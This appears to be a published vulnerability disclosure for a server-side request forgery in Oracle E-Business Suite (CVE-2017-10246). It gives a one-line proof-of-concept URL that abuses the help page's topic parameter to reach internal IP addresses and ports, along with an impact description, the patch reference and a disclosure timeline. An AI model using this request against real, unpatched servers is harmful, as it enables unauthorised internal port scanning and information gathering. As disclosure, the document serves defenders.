38 lines
No EOL
1.5 KiB
Text
38 lines
No EOL
1.5 KiB
Text
# Exploit Title: Oracle E-Business Suite - Server Side Request Forgery
|
|
# Date: 19 July 2017
|
|
# Exploit Author: Sarath Nair aka AceNeon13
|
|
# Contact: @AceNeon13
|
|
# Greetings: Raj3sh.tv, Deepu.tv
|
|
# Vendor Homepage: www.oracle.com
|
|
# Software Link:
|
|
http://www.oracle.com/us/products/applications/ebusiness/overview/index.html
|
|
# Version: Oracle E-Business Suite 12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6
|
|
# CVE: CVE-2017-10246
|
|
|
|
# PoC Exploit: Server Side Request Forgery
|
|
------------------------------------------
|
|
Vulnerable URL:
|
|
http://
|
|
<EBS_Application>/OA_HTML/help?locale=en_AE&group=per:br_prod_HR:US&topic=http://
|
|
<Internal_IP:Port>
|
|
|
|
# Description: The application is vulnerable to server side request forgery
|
|
attacks. We were able to use the web server to send packets internally and
|
|
thereby perform port scan on other internal assets and/or obtain
|
|
information accessible only from inside or otherwise not accessible to an
|
|
external user. It was also possible to query internal server information
|
|
otherwise unavailable publicly.
|
|
# Impact: A presumed attacker could use EBS server resources to conduct
|
|
internal information gathering or obtain information otherwise inaccessible
|
|
publicly.
|
|
# Solution: Apply the oracle EBS patch released on 18 July 2017
|
|
|
|
########################################
|
|
# Vulnerability Disclosure Timeline:
|
|
|
|
2017-April-29: Discovered vulnerability
|
|
2017-April-30: Vendor Notification
|
|
2017-May-01: Vendor Response/Feedback
|
|
2017-July-18: Vendor Fix/Patch
|
|
2017-July-19: Public Disclosure
|
|
######################################## |